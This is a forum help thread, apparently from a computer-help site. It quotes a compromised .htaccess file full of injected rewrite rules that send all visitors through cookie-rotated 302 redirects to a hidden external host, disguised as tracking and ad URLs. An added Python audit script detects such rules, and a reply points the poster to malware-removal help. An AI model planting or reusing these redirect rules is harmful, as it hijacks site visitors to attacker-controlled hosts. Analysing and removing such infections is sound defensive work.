RewriteRule ^.* http://%{ENV:mBZ}/lg.php?bannerid=189&campaignid=62&zoneid=52&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=0296e80428  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11962:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 30
RewriteRule ^.* http://%{ENV:mBZ}/imghover?iact=hm&ei=O9z7T5ykCcqIrAe3qsDjBg&q=hip+hop+dancer+vector&tbs=isz:l&page=1&tbnh=137&tbnw=193&start=0&ndsp=18&dur=986&tbnid=kFGvtGGSSEUXMM:&hovh=189&hovw=267&vpx=183&vpy=78&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=1t:1527,r:0,s:0,i:73&vetl=ms  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10185:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 31
RewriteRule ^.* http://%{ENV:mBZ}/statapi/stat/add?jsoncallback=jsonp1341195919976&app_id=4fd761140c62703013000228&article_id=842620&title=Liputan\%2520Khusus\%2520Piala\%2520Eropa\%25202012\%2520-Prandelli\%253A\%2520Meski\%2520Kalah\%252C\%2520Italia\%2520Membanggakan&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ip=10.50.12.118&browser=Mozilla&version=5.0+(Windows)&platform=Windows+NT+5.1&user_agent=Mozilla/5.0+(Windows+NT+5.1\%3B+rv:8.0.1)+Gecko/20100101+Firefox/8.0.1  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9115:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 32
RewriteRule ^.* http://%{ENV:mBZ}/fpc.pl?v=5.1.0.13.js&a=10001377311235&dpid=884078716&fpc=egOBDXwN\%7CW7O5tAhMaa\%7Cfses10001377311235\%3D\%7CSCaWN80Laa\%7CegOBDXwN\%7Cfvis10001377311235\%3DZT1odHRwJTNBJTJGJTJGdXMubWc0Lm1haWwueWFob28uY29tJTJGbmVvJTJGbGF1bmNoJTNGLnJhbmQlM0Ricmpmczlnb2lqOG5vJmY9aHR0cCUzQSUyRiUyRmlkLnlhaG9vLmNvbSUyRiUzRnAlM0R1cyZiPVlhaG9vISUyMEluZG9uZXNpYQ\%3D\%3D\%7C8MTsTMYHY0\%7C8MTsTMYHY0\%7C8MTsTMYHY0\%7Cs\%7C8MTsTMYHY0\%7C8MTsTMYHY0&ittidx=0&flv=Shockwave\%20Flash\%2011.1\%20r102&n=-7&g=en-US&h=N&j=1280x720&k=24&l=true&f=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&b=Yahoo!\%20Indonesia&enc=UTF-8&e=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&d=Mon\%2C\%2016\%20Jul\%202012\%2009:44:42\%20GMT  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10420:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 33
RewriteRule ^.* http://%{ENV:mBZ}/__utm.gif?utmwv=5.3.3&utms=2&utmn=1526049055&utmhn=jakartacity.olx.co.id&utme=8(2!entryPage)9(2!services/item/oldItem/207)11(2!1)&utmcs=UTF-8&utmsr=800x600&utmvp=783x440&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r22&utmdt=PELATIHAN\%205S\%20/\%205R\%20-\%20Jakarta\%20-\%20Jasa\%20Lain&utmhid=1618081241&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=services/item/oldItem/207&utmac=UA-2530746-1&utmcc=__utma\%3D209359949.41587538.1340963965.1340963965.1340963965.1\%3B\%2B__utmz\%3D209359949.1340963965.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dpelatihan\%25205s\%2520jakarta\%3B&utmu=uzGgAAAAIAAAAAAAAAAAAAB~  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9372:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 34
RewriteRule ^.* http://%{ENV:mBZ}/_xhr/ugccomments/?method=get_context_uuid&context_id=28729240&0.5455820464596506&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&context_category=video  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10985:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 35
RewriteRule ^.* http://%{ENV:mBZ}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-11874&sessionID=1342079833405.48704&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/chou_yo_hana_yo/v04/c017/8.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.yRpGWk2N&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/chou_yo_hana_yo/v04/c017/7.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Chou\%20yo\%20Hana\%20yo\%2017\%20-\%20Read\%20Chou\%20yo\%20Hana\%20yo\%20Chapter\%2017\%20Online\%20-\%20Page\%208&ts1342079833407.0=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9117:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 36
RewriteRule ^.* http://%{ENV:mBZ}/ja/a/hb/i/sg/adv/infinity/infinity_local_backfill_reordered_favicon.html?rnd=119313&ysm_rd=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_cm=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_ss=&ysm_ss_tag=&ysm_hs=&ysm_max_ads=6&ysm_ads_per_page=3&ysm_scroll_delay=10000&ysm_landing_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_width=300&ysm_height=250&ysm_css=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_backup_gif=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_mkt=id  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11071:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 37
RewriteRule ^.* http://%{ENV:mBZ}/publisherEvent?eventtype=impression&pid=467&chid=753&wid=3439&type=icatcher&query=section\%208&preselections=0db5bd50397eaa57750d6f3014b37984f06fe2d4,957fd3a8bde15302e80d44d0894f2ef07a4007d2,03a6696176e24ee12ffe35ce4772163098f23c0c,5716f4e73fc36eb0302bd7aa45e266eb9a565f64,0d458f03f4ca434b9ad325b25882b5c7435f34a0,8303f200908ac1a9d6bb5d9b566b2e256a052fa9&location=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pcid=C42D1289-1880-0001-8297-1E30178F14C7&sid=C42D1289-1980-0001-B59C-15901A449960&xpos=-1&ypos=-1&adId=733&biddingId=7099&bp=10&random=1264498545349&target=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11275:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 38
RewriteRule ^.* http://%{ENV:mBZ}/neo/darla/php/fc.php?trace=folder_inbox&tID=2&d=0&f=978532093&l=SKY\%2CREC\%2CMNW&rn=1341567813763&en=utf-8&mb_s_en=utf-8&filter=no_expandable\%253Bajax_cert_expandable\%253Bexp_iframe_expandable\%253B&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sa=content\%253D\%2522minty_tenure\%253A\%2520week\%25203+\%2522&  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9654:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 39
RewriteRule ^.* http://%{ENV:mBZ}/delivery/lg.php?bannerid=35927&campaignid=4402&zoneid=1970&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=367883a46c  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9666:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 40
RewriteRule ^.* http://%{ENV:mBZ}/router/?ishd=0&w=trafficList&ign=0&wn=1&cen=1&nv=1&inu=1&pvid=1342234061495-024900513923076795&pvnum=1&tats=2&fl=0&vid=new&rn=0&lg=1&u=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&t=e-Journal\%20Unesa&sw=1024&sh=768&pid=0&wid=679ae0f4d0e30665&proid=0&fhst=&tft=3&wh=Live+Traffic+Feed&hl=0&hlnks=0&srefs=0&hbars=0&hfce=0&wne=10&msum=5289712a&gid=0&flt=724&fv=0&tfen=1&flc=&lu=0&isIE=0&oldB=0&mgen=Open\%20Journal\%20Systems\%202.3.6.0&fjv=2&rand=477800989&ww=200  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9855:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 41
RewriteRule ^.* http://%{ENV:mBZ}/delivery/lg.php?bannerid=36709&campaignid=7505&zoneid=1656&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=8c0d2df6ce  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10626:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 42
RewriteRule ^.* http://%{ENV:mBZ}/webpagethumbnail?r=4&f=3&s=400:585&query=keruntuhan+komunis+di+cina&hl=id&gl=id&c=29&d=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&b=1&j=google.nyc.c.j_pkTpT7_LLIS0rAfPo7ySDg_1844790126_2&a=yiN  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9332:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 43
RewriteRule ^.* http://%{ENV:mBZ}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/tsuki_to_himawari/v01/c000/18.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10712:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 44
RewriteRule ^.* http://%{ENV:mBZ}/imghover?iact=hm&ei=UhTkT-LNFofprAfjxLn3CA&q=batu+badar+asem&tbs=&page=4&tbnh=163&tbnw=217&start=56&ndsp=20&dur=167&tbnid=nrZqw0nknn4i7M:&hovh=183&hovw=275&vpx=441&vpy=225&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=1t:1527,r:12,s:56,i:290&vetl=ms  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9051:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 45
RewriteRule ^.* http://%{ENV:mBZ}/__utm.gif?utmwv=5.3.2&utms=6&utmn=1116491465&utmhn=www.yuktravel.com&utmcs=ISO-8859-1&utmsr=1024x600&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Booking\%20Hotel\%20di\%20Indonesia\%20-\%20Promo\%20Voucher\%20Hotel\%20Indonesia&utmhid=1345609067&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/hotel-domestik/&utmac=UA-24781983-3&utmcc=__utma\%3D156601188.229284525.1340326523.1340758277.1340760543.5\%3B\%2B__utmz\%3D156601188.1340760543.5.5.utmcsr\%3Dweddingku.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/collections/1/1/JKT/gaun-pengantin\%3B&utmu=qB~  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11628:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 46
RewriteRule ^.* http://%{ENV:mBZ}/neo/darla/php/fc.php?trace=folder_inbox&tID=3&d=0&f=978500093&l=SKY\%2CREC\%2CMNW&rn=1341276729442&en=utf-8&filter=no_expandable\%253Bajax_cert_expandable\%253Bexp_iframe_expandable\%253B&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sa=content\%253D\%2522minty_tenure\%253A\%2520week\%25203+\%2522&  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9233:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 47
RewriteRule ^.* http://%{ENV:mBZ}/stats.js?cleartogo=1&cc=&refpp=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&site=5013&icon=1&sw=1366&hw=768&color=32&f=1&uiqGTOP=&cc=&hascookie=1&1XcAdGTOP=&j=1&c=1&lang=es&timezone=23&referer=4gifs.com&word=/gallery/main.php\%3Fg2_page\%3D3&browser=5&os=10&swords=0&-&fromd=4gifs.com&fromp=/gallery/v/Soccer_dive_mouth.gif.html&0  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9751:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 48
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=8&c2=6299460&c3=1000000000000000002&ns__t=1340928564196&ns_c=ISO-8859-1&c8=KapanLagi.com:\%20Foto\%20No:\%204\%20-\%20Honda\%20Odyssey\%202002\%20Rp.\%20137.500.000\%20IN-1696774\%20Otosia.com&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10160:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 49
RewriteRule ^.* http://%{ENV:mBZ}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-14847&sessionID=1342439779185.12388&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/fly_high/v01/c002/34.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.IqiZaZ3h&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/fly_high/v01/c002/33.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Fly\%20High!\%202\%20-\%20Read\%20Fly\%20High!\%20Chapter\%202\%20Online\%20-\%20Page\%2034&ts1342439779187.0=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11871:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 50
RewriteRule ^.* http://%{ENV:mBZ}/b/ss/jobsdb-prd-id/1/H.23.6/s35250521085753?AQB=1&ndh=1&t=3/6/2012\%2010:16:5\%202\%20-420&ce=UTF-8&ns=jobsdb&pageName=search/jobadsingledetail&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&server=id.jobsdb.com&events=event4\%2Cevent1&c1=EN&v1=EN&c2=search&v2=search&c4=logged\%20out:search/jobadsingledetail&v4=logged\%20out&c5=/id/en/search.mvc/jobadsingledetail&v5=/id/en/search.mvc/jobadsingledetail&c6=D\%3Dg&v6=D\%3Dg&c10=D\%3Ds_vi&v10=D\%3Ds_vi&v25=200003000423301&v30=Clerical\%20/\%20Admin\%20Staff\%20/\%20General\%20Affair(17)\%2CElectrical\%20/\%20Electronics(95)\%2CApplication\%20Specialist\%20-\%20Software\%20/\%20Programming(132)&h1=search/jobadsingledetail&s=1024x768&c=24&j=1.7&v=N&k=Y&bw=674&bh=398&p=Shockwave\%20Flash\%3BAdobe\%20Acrobat\%3BMicrosoft\%C2\%AE\%20DRM\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3B&AQE=1  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11616:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 51
RewriteRule ^.* http://%{ENV:mBZ}/pixel;r=1146139776;a=p-dd9FcP3j0Ujek;fpan=0;fpa=P0-448768694-1340327916931;ns=0;ce=1;je=0;sr=1024x768x24;enc=n;dst=0;et=1340328404189;tzo=-420;ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9043:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 52
RewriteRule ^.* http://%{ENV:mBZ}/t.gif?_=1341910805967&count=horizontal&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=Bosan\%20dengan\%20Angry\%20Birds\%3F\%20Sebentar\%20lagi\%20akan\%20ada\%20Angry\%20Pigs!\%20\%20&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&via=merdekadotcom&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=1&twttr_li=0&twttr_pid=v3:1341904553633267583398819  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11433:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 53
RewriteRule ^.* http://%{ENV:mBZ}/imghover?iact=hm&ei=JH_-T9bUG4LLrQf6_YnCBg&q=laundry+logo&tbs=&page=14&tbnh=119&tbnw=212&start=265&ndsp=20&dur=545&tbnid=MkBv1i5WWOQqJM:&hovh=168&hovw=300&vpx=531&vpy=243&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=1t:1527,r:7,s:265,i:298&vetl=ms  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11279:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 54
RewriteRule ^.* http://%{ENV:mBZ}/iu3?d=assoc-amazon.com&rP=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cB=3825227112148294  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11920:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 55
RewriteRule ^.* http://%{ENV:mBZ}/st?ad_type=pop&ad_size=0x0&section=3132152&banned_pop_types=23&pop_times=100&pop_frequency=0&pub_redirect=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11011:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 56
RewriteRule ^.* http://%{ENV:mBZ}/adj/N3568.139749.9958923604621/B4230567.2;sz=728x90;click=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9722:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 57
RewriteRule ^.* http://%{ENV:mBZ}/p?pub=s438b7lqmkmdk5pkfek4&random=1342162921574&pu=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pq=k\%3DfaSMTM0MjE2MjgyMTA3Nzk0NjM4NjU\%253DfbSMWM5fcSMTM4N2YyMzVmZDU\%253DfdSMTM4N2YyM2M5MWQ\%253DfeSfgSYzQ\%253DfhSMTdkfiSOTk\%253DfjSfkSMTU5flSfmSNzA\%253DfnSNzA\%253DfoSfpSMTdkfqSMjA\%253DfrSMw\%253D\%253DfsSaHR0cDovL21hbmdhZm94Lm1lL21hbmdhL2ZhaXJ5X3RhaWwvdjM0L2MyODkvM\%25245odG1sftSaHR0cDovL21hbmdhZm94Lm1lL21hbmdhL2ZhaXJ5X3RhaWwvdjM0L2MyODgvMjUuaHRtbA\%253D\%253DfuSaHR0cDovL21hbmdhZm94Lm1lL21hbmdhL2ZhaXJ5X3RhaWw\%253DfvSOGY\%253DfwSYzQ\%253DfxSNWE1fySOTk\%253DfzSNTgx&t=view&pt=This\%20Transformation\%20Shocked\%20A\%20Whole\%20Network\%20-\%20MGID&vGUID=9b69fc5b-bc82-72f3-50ba-167604db1e77  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9549:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 58
RewriteRule ^.* http://%{ENV:mBZ}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-8365&sessionID=1341484779951.40591&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/metallic_colors/c001/39.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.shFV0Inm&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/metallic_colors/c001/38.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Metallic\%20Colors\%201\%20-\%20Read\%20Metallic\%20Colors\%20Chapter\%201\%20Online\%20-\%20Page\%2039&ts1341484779953.0=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10627:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 59
RewriteRule ^.* http://%{ENV:mBZ}/s?nsivbblmin=12834.000&vq=auto&nsivbblmax=39266.000&ad_event=3&vid=_9alL9wKgMaud9fHDA1p2698EClXVF8dC&lact=3694&et=0.267&st=0.267&rendering=software&vh=360&decoding=accelerated&at=2_3&vw=640&nsiabblmin=510.000&feature=relmfu&tsphab=1&hbd=4255793&tspne=0&ns=yt&hbt=211.031&tspfdt=1547&plid=AATEeERFtmk17CxV&cr=ID&fv=WIN\%2010\%2C2\%2C152\%2C32&playback=1&el=detailpage&hl=en_US&ad_flags=0&w=640&nsiabblc=17&sd=B6F5EF806HH1341920728903797&nsivbblmean=22849.706&fmt=34&nsiabblmax=1815.000&bc=474423&docid=nQKr2xOER3M&cid=12045&allowed=1_1,1_3,2_1,2_3&art=1.546&md=1&len=36&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&bd=347562&bt=2.001&hasstoryboard=1&csipt=watch5ad&sdetail=f:relmfu\%2Crv:AijEQN6AuRs&volume=100&tpmt=0&cfps=0&screenw=1360&screenh=768&sst=0&fexp=920704,912706,921602,924700,914501,913542,907335,922600,919306,907341,907344,907217,920706,919316,902518,919324,924500,906717,910207&sendtmp=1&mt=0&h=360&slots=sst~0;sidx~0;at~2_3&scoville=1&playerw=640&playerh=390&mos=0&sidx=0&fs=0&sourceid=yw&nsiabblmean=841.471&nsivbblc=17&ptk=TheStation\%2Buser&rt=3.826  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11464:/:0:HttpOnly]
 
</IfModule>
#1a55cca5fd9632973e9f2845921448fcdad6d8d0cb74721e03d5e983
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
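An added example, not part of the original post: a small Python audit for the traits this file shows, namely rules hidden below a long run of blank lines, catch-all `RewriteRule` redirects whose host comes from an environment variable, and cookies set through the `CO` flag. The function name, the threshold and the sample text are assumptions made for illustration; the sample is constructed to mirror the rule shape above.

```python
import re

# Constructed sample modelled on the rule shape in the post; the path is a placeholder.
SAMPLE = (
    "Deny from all\n"
    + "\n" * 900
    + "<IfModule mod_rewrite.c>\n"
    "RewriteEngine On\n"
    "RewriteCond %{ENV:bFP} 43\n"
    "RewriteRule ^.* http://%{ENV:mBZ}/api/x.php?url=http\\%3A\\%2F\\%2F%{HTTP_HOST}\\%2F  "
    "[R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10712:/:0:HttpOnly]\n"
    "RewriteRule ^index\\.php$ - [L]\n"
    "</IfModule>\n"
)

# RewriteRule <pattern> <substitution> [flags]
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)
CATCH_ALL = {"^.*", ".*", "^(.*)$", "^"}

def audit_htaccess(text, blank_run_threshold=50):
    """Return (line_number, finding) tuples for suspicious constructs (hypothetical helper)."""
    findings, blank_run = [], 0
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            blank_run += 1
            continue
        # Directives pushed far below the visible part of the file.
        if blank_run >= blank_run_threshold:
            findings.append((no, f"content hidden after {blank_run} blank lines"))
        blank_run = 0
        m = RULE.match(line)
        if not m:
            continue
        pattern, target, flags = m.group(1), m.group(2), m.group(3) or ""
        flag_names = {f.split("=")[0].strip().upper() for f in flags.split(",") if f.strip()}
        external = re.match(r"(?i)https?://", target) is not None
        if external and flag_names & {"R", "REDIRECT"}:
            if re.match(r"(?i)https?://%\{ENV:", target):
                findings.append((no, "redirect to host taken from an environment variable"))
            else:
                findings.append((no, "external redirect"))
            if pattern in CATCH_ALL:
                findings.append((no, "redirect applies to every request path"))
        if flag_names & {"CO", "COOKIE"}:
            findings.append((no, "rule sets a cookie via the CO flag"))
    return findings
```

Run it on a copy of the file, for example `audit_htaccess(open(".htaccess").read())`; the findings are indicators to review, not a verdict.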
 

 



#2 JohnC_21

JohnC_21

  • Members
  • 23,609 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:50 PM

Posted 25 March 2018 - 03:42 PM

If the file regenerates then it could very well be an infection. You are in the wrong forum. Start a thread in the Virus Removal Forum. Make sure you read the pinned posts and be sure to include the FRST log in your post or you will be kicked out to the Am I Infected Forum. A Malware Removal Expert will examine the FRST log and provide assistance.





